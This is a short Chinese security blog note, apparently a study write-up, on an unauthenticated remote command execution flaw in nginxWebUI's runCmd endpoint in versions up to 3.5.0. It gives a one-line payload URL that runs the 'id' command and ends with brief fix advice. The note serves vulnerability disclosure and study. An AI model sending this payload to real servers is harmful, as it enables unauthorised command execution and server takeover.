nginxWebUI runCmd 远程命令执行漏洞
声明:该网站大部分文章来自作者日常学习笔记,文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任.
nginxWebUI runCmd 远程命令执行漏洞
0x01 漏洞描述及影响
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载.
nginxWebUI后台提供执行nginx相关命令的接口,未对用户的输入进行过滤,导致可在后台执行任意命令.并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果,甚至接管服务器.
0x02 受影响的版本
nginxWebUI <= 3.5.0
0x03 漏洞复现
payload:
1 | http://XXXX/AdminPage/conf/runCmd?cmd=id |
.png)
.png)
0x04 漏洞修复
如非必要,不要将该系统暴露在互联网上.
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
评论